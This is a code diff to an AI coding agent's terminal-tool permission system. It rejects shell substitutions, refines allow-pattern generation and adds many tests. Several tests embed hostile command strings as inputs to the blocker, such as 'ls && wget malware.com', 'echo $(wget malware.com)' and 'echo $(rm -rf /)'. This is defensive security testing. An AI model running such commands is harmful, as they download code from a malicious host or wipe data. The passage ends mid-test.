diff --git a/crates/agent/src/pattern_extraction.rs b/crates/agent/src/pattern_extraction.rs index 69a7abae32d6df9c2755e53292ab1c1a1b5341de..19f00fea14156131cc0062921aa3ce334705e89a 100644 --- a/crates/agent/src/pattern_extraction.rs +++ b/crates/agent/src/pattern_extraction.rs @@ -1,4 +1,4 @@ -use shell_command_parser::extract_commands; +use shell_command_parser::extract_terminal_command_prefix; use std::path::{Path, PathBuf}; use url::Url; @@ -18,8 +18,8 @@ fn is_plain_command_token(token: &str) -> bool { } struct CommandPrefix { - command: String, - subcommand: Option, + normalized_tokens: Vec, + display: String, } /// Extracts the command name and optional subcommand from a shell command using @@ -30,29 +30,15 @@ struct CommandPrefix { /// syntax correctly. Returns `None` if parsing fails or if the command name /// contains path separators (for security reasons). fn extract_command_prefix(command: &str) -> Option { - let commands = extract_commands(command)?; - let first_command = commands.first()?; + let prefix = extract_terminal_command_prefix(command)?; - let mut tokens = first_command.split_whitespace(); - let first_token = tokens.next()?; - - // Only allow alphanumeric commands with hyphens/underscores. - // Reject paths like "./script.sh" or "/usr/bin/python" to prevent - // users from accidentally allowing arbitrary script execution. - if !is_plain_command_token(first_token) { + if !is_plain_command_token(&prefix.command) { return None; } - // Include the subcommand (second non-flag token) when present, to produce - // more specific patterns like "cargo test" instead of just "cargo". - let subcommand = tokens - .next() - .filter(|second_token| is_plain_command_token(second_token)) - .map(|second_token| second_token.to_string()); - Some(CommandPrefix { - command: first_token.to_string(), - subcommand, + normalized_tokens: prefix.tokens, + display: prefix.display, }) } @@ -64,25 +50,25 @@ fn extract_command_prefix(command: &str) -> Option { /// scripts or absolute paths which could be manipulated by an attacker. pub fn extract_terminal_pattern(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - let escaped_command = regex::escape(&prefix.command); - Some(match &prefix.subcommand { - Some(subcommand) => { - format!( - "^{}\\s+{}(\\s|$)", - escaped_command, - regex::escape(subcommand) - ) - } - None => format!("^{}\\b", escaped_command), - }) + let tokens = prefix.normalized_tokens; + + match tokens.as_slice() { + [] => None, + [single] => Some(format!("^{}\\b", regex::escape(single))), + [rest @ .., last] => Some(format!( + "^{}\\s+{}(\\s|$)", + rest.iter() + .map(|token| regex::escape(token)) + .collect::>() + .join("\\s+"), + regex::escape(last) + )), + } } pub fn extract_terminal_pattern_display(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - match prefix.subcommand { - Some(subcommand) => Some(format!("{} {}", prefix.command, subcommand)), - None => Some(prefix.command), - } + Some(prefix.display) } pub fn extract_path_pattern(path: &str) -> Option { @@ -208,9 +194,24 @@ mod tests { assert!(!pattern.is_match("cargo build-foo")); assert!(!pattern.is_match("cargo builder")); + // Env-var prefixes are included in generated patterns + assert_eq!( + extract_terminal_pattern("PAGER=blah git log --oneline"), + Some("^PAGER=blah\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("A=1 B=2 git log"), + Some("^A=1\\s+B=2\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("PAGER='less -R' git log"), + Some("^PAGER='less \\-R'\\s+git\\s+log(\\s|$)".to_string()) + ); + // Path-like commands are rejected assert_eq!(extract_terminal_pattern("./script.sh arg"), None); assert_eq!(extract_terminal_pattern("/usr/bin/python arg"), None); + assert_eq!(extract_terminal_pattern("PAGER=blah ./script.sh arg"), None); } #[test] @@ -235,6 +236,41 @@ mod tests { extract_terminal_pattern_display("ls"), Some("ls".to_string()) ); + assert_eq!( + extract_terminal_pattern_display("PAGER=blah git log --oneline"), + Some("PAGER=blah git log".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("PAGER='less -R' git log"), + Some("PAGER='less -R' git log".to_string()) + ); + } + + #[test] + fn test_terminal_pattern_regex_normalizes_whitespace() { + let pattern = extract_terminal_pattern("PAGER=blah git log --oneline") + .expect("expected terminal pattern"); + let regex = regex::Regex::new(&pattern).expect("expected valid regex"); + + assert!(regex.is_match("PAGER=blah git log")); + assert!(regex.is_match("PAGER=blah git log --stat")); + } + + #[test] + fn test_extract_terminal_pattern_skips_redirects_before_subcommand() { + assert_eq!( + extract_terminal_pattern("git 2>/dev/null log --oneline"), + Some("^git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("git 2>/dev/null log --oneline"), + Some("git 2>/dev/null log".to_string()) + ); + + assert_eq!( + extract_terminal_pattern("rm --force foo"), + Some("^rm\\b".to_string()) + ); } #[test] diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index e8a8acefce6d5728cd666d7fb7cb87ec3dcccb3e..534b70aaee5cb62a0f343d5adf0ef7b196e49d94 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -48,7 +48,7 @@ use std::{ rc::Rc, sync::{ Arc, - atomic::{AtomicBool, Ordering}, + atomic::{AtomicBool, AtomicUsize, Ordering}, }, time::Duration, }; @@ -58,14 +58,14 @@ mod edit_file_thread_test; mod test_tools; use test_tools::*; -fn init_test(cx: &mut TestAppContext) { +pub(crate) fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); }); } -struct FakeTerminalHandle { +pub(crate) struct FakeTerminalHandle { killed: Arc, stopped_by_user: Arc, exit_sender: std::cell::RefCell>>, @@ -75,7 +75,7 @@ struct FakeTerminalHandle { } impl FakeTerminalHandle { - fn new_never_exits(cx: &mut App) -> Self { + pub(crate) fn new_never_exits(cx: &mut App) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); @@ -99,7 +99,7 @@ impl FakeTerminalHandle { } } - fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { + pub(crate) fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); let (exit_sender, _exit_receiver) = futures::channel::oneshot::channel(); @@ -118,15 +118,15 @@ impl FakeTerminalHandle { } } - fn was_killed(&self) -> bool { + pub(crate) fn was_killed(&self) -> bool { self.killed.load(Ordering::SeqCst) } - fn set_stopped_by_user(&self, stopped: bool) { + pub(crate) fn set_stopped_by_user(&self, stopped: bool) { self.stopped_by_user.store(stopped, Ordering::SeqCst); } - fn signal_exit(&self) { + pub(crate) fn signal_exit(&self) { if let Some(sender) = self.exit_sender.borrow_mut().take() { let _ = sender.send(()); } @@ -178,18 +178,23 @@ impl SubagentHandle for FakeSubagentHandle { } #[derive(Default)] -struct FakeThreadEnvironment { +pub(crate) struct FakeThreadEnvironment { terminal_handle: Option>, subagent_handle: Option>, + terminal_creations: Arc, } impl FakeThreadEnvironment { - pub fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { + pub(crate) fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { Self { terminal_handle: Some(terminal_handle.into()), ..self } } + + pub(crate) fn terminal_creation_count(&self) -> usize { + self.terminal_creations.load(Ordering::SeqCst) + } } impl crate::ThreadEnvironment for FakeThreadEnvironment { @@ -200,6 +205,7 @@ impl crate::ThreadEnvironment for FakeThreadEnvironment { _output_byte_limit: Option, _cx: &mut AsyncApp, ) -> Task>> { + self.terminal_creations.fetch_add(1, Ordering::SeqCst); let handle = self .terminal_handle .clone() diff --git a/crates/agent/src/tool_permissions.rs b/crates/agent/src/tool_permissions.rs index 4cb4d265b3170429430b815d7490099a50678714..345511c5025b25601c630c572980d44a23f724e7 100644 --- a/crates/agent/src/tool_permissions.rs +++ b/crates/agent/src/tool_permissions.rs @@ -2,13 +2,19 @@ use crate::AgentTool; use crate::tools::TerminalTool; use agent_settings::{AgentSettings, CompiledRegex, ToolPermissions, ToolRules}; use settings::ToolPermissionMode; -use shell_command_parser::extract_commands; +use shell_command_parser::{ + TerminalCommandValidation, extract_commands, validate_terminal_command, +}; use std::path::{Component, Path}; use std::sync::LazyLock; use util::shell::ShellKind; const HARDCODED_SECURITY_DENIAL_MESSAGE: &str = "Blocked by built-in security rule. This operation is considered too \ harmful to be allowed, and cannot be overridden by settings."; +const INVALID_TERMINAL_COMMAND_MESSAGE: &str = "The terminal command could not be approved because terminal does not \ + allow shell substitutions or interpolations in permission-protected commands. Forbidden examples include $VAR, \ + ${VAR}, $(...), backticks, $((...)), <(...), and >(...). Resolve those values before calling terminal, or ask \ + the user for the literal value to use."; /// Security rules that are always enforced and cannot be overridden by any setting. /// These protect against catastrophic operations like wiping filesystems. @@ -256,7 +262,30 @@ impl ToolPermissionDecision { return denial; } - let rules = match permissions.tools.get(tool_name) { + let rules = permissions.tools.get(tool_name); + + // Check for invalid regex patterns before evaluating rules. + // If any patterns failed to compile, block the tool call entirely. + if let Some(error) = rules.and_then(|rules| check_invalid_patterns(tool_name, rules)) { + return ToolPermissionDecision::Deny(error); + } + + if tool_name == TerminalTool::NAME + && !rules.map_or( + matches!(permissions.default, ToolPermissionMode::Allow), + |rules| is_unconditional_allow_all(rules, permissions.default), + ) + && inputs.iter().any(|input| { + matches!( + validate_terminal_command(input), + TerminalCommandValidation::Unsafe | TerminalCommandValidation::Unsupported + ) + }) + { + return ToolPermissionDecision::Deny(INVALID_TERMINAL_COMMAND_MESSAGE.into()); + } + + let rules = match rules { Some(rules) => rules, None => { // No tool-specific rules, use the global default @@ -270,12 +299,6 @@ impl ToolPermissionDecision { } }; - // Check for invalid regex patterns before evaluating rules. - // If any patterns failed to compile, block the tool call entirely. - if let Some(error) = check_invalid_patterns(tool_name, rules) { - return ToolPermissionDecision::Deny(error); - } - // For the terminal tool, parse each input command to extract all sub-commands. // This prevents shell injection attacks where a user configures an allow // pattern like "^ls" and an attacker crafts "ls && rm -rf /". @@ -407,6 +430,18 @@ fn check_commands( } } +fn is_unconditional_allow_all(rules: &ToolRules, global_default: ToolPermissionMode) -> bool { + // `always_allow` is intentionally not checked here: when the effective default + // is already Allow and there are no deny/confirm restrictions, allow patterns + // are redundant — the user has opted into allowing everything. + rules.always_deny.is_empty() + && rules.always_confirm.is_empty() + && matches!( + rules.default.unwrap_or(global_default), + ToolPermissionMode::Allow + ) +} + /// Checks if the tool rules contain any invalid regex patterns. /// Returns an error message if invalid patterns are found. fn check_invalid_patterns(tool_name: &str, rules: &ToolRules) -> Option { @@ -1067,6 +1102,107 @@ mod tests { )); } + #[test] + fn invalid_substitution_bearing_command_denies_by_default() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Deny); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn invalid_substitution_bearing_command_denies_in_confirm_mode() { + let decision = no_rules("echo $(whoami)", ToolPermissionMode::Confirm); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_without_tool_rules() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Allow); + assert_eq!(decision, ToolPermissionDecision::Allow); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_with_terminal_default_allow() { + let mut tools = collections::HashMap::default(); + tools.insert( + Arc::from(TerminalTool::NAME), + ToolRules { + default: Some(ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + let permissions = ToolPermissions { + default: ToolPermissionMode::Confirm, + tools, + }; + + assert_eq!( + ToolPermissionDecision::from_input( + TerminalTool::NAME, + &["echo $(whoami)".to_string()], + &permissions, + ShellKind::Posix, + ), + ToolPermissionDecision::Allow + ); + } + + #[test] + fn old_anchored_pattern_no_longer_matches_env_prefixed_command() { + t("PAGER=blah git log").allow(&["^git\\b"]).is_confirm(); + } + + #[test] + fn env_prefixed_allow_pattern_matches_env_prefixed_command() { + t("PAGER=blah git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_allow(); + } + + #[test] + fn env_prefixed_allow_pattern_requires_matching_env_value() { + t("PAGER=more git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn env_prefixed_allow_patterns_require_all_extracted_commands_to_match() { + t("PAGER=blah git log && git status") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all() { + let decision = no_rules("rm -rf /", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all_for_invalid_command() { + let decision = no_rules("echo $(rm -rf /)", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + #[test] fn shell_injection_via_double_ampersand_not_allowed() { t("ls && wget malware.com").allow(&["^ls"]).is_confirm(); @@ -1086,14 +1222,14 @@ mod tests { fn shell_injection_via_backticks_not_allowed() { t("echo `wget malware.com`") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] fn shell_injection_via_dollar_parens_not_allowed() { t("echo $(wget malware.com)") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] @@ -1113,12 +1249,12 @@ mod tests { #[test] fn shell_injection_via_process_substitution_input_not_allowed() { - t("cat <(wget malware.com)").allow(&["^cat"]).is_confirm(); + t("cat <(wget malware.com)").allow(&["^cat"]).is_deny(); } #[test] fn shell_injection_via_process_substitution_output_not_allowed() { - t("ls >(wget malware.com)").allow(&["^ls"]).is_confirm(); + t("ls >(wget malware.com)").allow(&["^ls"]).is_deny(); } #[test] @@ -1269,15 +1405,15 @@ mod tests { } #[test] - fn nested_command_substitution_all_checked() { + fn nested_command_substitution_is_denied() { t("echo $(cat $(whoami).txt)") .allow(&["^echo", "^cat", "^whoami"]) - .is_allow(); + .is_deny(); } #[test] - fn parse_failure_falls_back_to_confirm() { - t("ls &&").allow(&["^ls$"]).is_confirm(); + fn parse_failure_is_denied() { + t("ls &&").allow(&["^ls$"]).is_deny(); } #[test] diff --git a/crates/agent/src/tools/terminal_tool.rs b/crates/agent/src/tools/terminal_tool.rs index 6396bd1b0e63b46a0207dd7df9b9f2fcd00176b7..82bf9a06480bb7d6db3611516281f42452ec5137 100644 --- a/crates/agent/src/tools/terminal_tool.rs +++ b/crates/agent/src/tools/terminal_tool.rs @@ -29,6 +29,8 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// /// Make sure you use the `cd` parameter to navigate to one of the root directories of the project. NEVER do it as part of the `command` itself, otherwise it will error. /// +/// Do not generate terminal commands that use shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`. Resolve those values yourself before calling this tool, or ask the user for the literal value to use. +/// /// Do not use this tool for commands that run indefinitely, such as servers (like `npm run start`, `npm run dev`, `python -m http.server`, etc) or file watchers that don't terminate on their own. /// /// For potentially long-running commands, prefer specifying `timeout_ms` to bound runtime and prevent indefinite hangs. @@ -39,7 +41,7 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// Some commands can be configured not to do this, such as `git --no-pager diff` and similar. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct TerminalToolInput { - /// The one-liner command to execute. + /// The one-liner command to execute. Do not include shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`; resolve those values first or ask the user. pub command: String, /// Working directory for the command. This must be one of the root directories of the project. pub cd: String, @@ -628,4 +630,824 @@ mod tests { result ); } + + #[gpui::test] + async fn test_run_rejects_invalid_substitution_before_terminal_creation( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.expect_err("expected invalid terminal command to be rejected"); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "expected explicit invalid-command message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for invalid commands" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + ), + "invalid command should not request authorization" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallUpdate( + acp_thread::ToolCallUpdate::UpdateFields(_) + )))) + ), + "invalid command should not emit a terminal card update" + ); + } + + #[gpui::test] + async fn test_run_allows_invalid_substitution_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update in unconditional allow-all mode" + ); + + let result = task + .await + .expect("command should proceed in unconditional allow-all mode"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected invalid-command rejection output: {result}" + ); + } + + #[gpui::test] + async fn test_run_hardcoded_denial_still_wins_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(rm -rf /)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("hardcoded denial should override unconditional allow-all"); + assert!( + error.contains("built-in security rule"), + "expected hardcoded denial message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "hardcoded denial should prevent terminal creation" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + ), + "hardcoded denial should not request authorization" + ); + } + + #[gpui::test] + async fn test_run_env_prefixed_allow_pattern_is_used_end_to_end(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log --oneline".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update for matching env-prefixed allow rule" + ); + + let result = task + .await + .expect("expected env-prefixed command to be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for allowed env-prefixed command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn test_run_old_anchored_git_pattern_no_longer_auto_allows_env_prefix( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Confirm), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^git\b", false).unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let _task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let _auth = rx.expect_authorization().await; + assert!( + environment.terminal_creation_count() == 0, + "confirm flow should not create terminal before authorization" + ); + } + + #[test] + fn test_terminal_tool_description_mentions_forbidden_substitutions() { + let description = ::description().to_string(); + + assert!( + description.contains("$VAR"), + "missing $VAR example: {description}" + ); + assert!( + description.contains("${VAR}"), + "missing ${{VAR}} example: {description}" + ); + assert!( + description.contains("$(...)"), + "missing $(...) example: {description}" + ); + assert!( + description.contains("backticks"), + "missing backticks example: {description}" + ); + assert!( + description.contains("$((...))"), + "missing $((...)) example: {description}" + ); + assert!( + description.contains("<(...)") && description.contains(">(...)"), + "missing process substitution examples: {description}" + ); + } + + #[test] + fn test_terminal_tool_input_schema_mentions_forbidden_substitutions() { + let schema = ::input_schema( + language_model::LanguageModelToolSchemaFormat::JsonSchema, + ); + let schema_json = serde_json::to_value(schema).expect("schema should serialize"); + let schema_text = schema_json.to_string(); + + assert!( + schema_text.contains("$VAR"), + "missing $VAR example: {schema_text}" + ); + assert!( + schema_text.contains("${VAR}"), + "missing ${{VAR}} example: {schema_text}" + ); + assert!( + schema_text.contains("$(...)"), + "missing $(...) example: {schema_text}" + ); + assert!( + schema_text.contains("backticks"), + "missing backticks example: {schema_text}" + ); + assert!( + schema_text.contains("$((...))"), + "missing $((...)) example: {schema_text}" + ); + assert!( + schema_text.contains("<(...)") && schema_text.contains(">(...)"), + "missing process substitution examples: {schema_text}" + ); + } + + async fn assert_rejected_before_terminal_creation( + command: &str, + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: command.to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.unwrap_err(); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "command {command:?} should be rejected with substitution message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "no terminal should be created for rejected command {command:?}" + ); + assert!( + !matches!( + rx.try_next(), + Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + ), + "rejected command {command:?} should not request authorization" + ); + } + + #[gpui::test] + async fn test_rejects_variable_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ${HOME}", cx).await; + } + + #[gpui::test] + async fn test_rejects_positional_parameter(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $1", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_question(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $?", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_dollar(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $$", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_at(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $@", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_dollar_parens(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(whoami)", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_backticks(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo `whoami`", cx).await; + } + + #[gpui::test] + async fn test_rejects_arithmetic_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $((1 + 1))", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_input(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("cat <(ls)", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_output(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("ls >(cat)", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_variable(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$HOME git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$(whoami) git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_brace_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation( + "GIT_SEQUENCE_EDITOR=${EDITOR} git rebase -i HEAD~2", + cx, + ) + .await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_on_second_line(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ok\necho $HOME", cx).await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_mixed(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=less git log\necho $(whoami)", cx).await; + } + + #[gpui::test] + 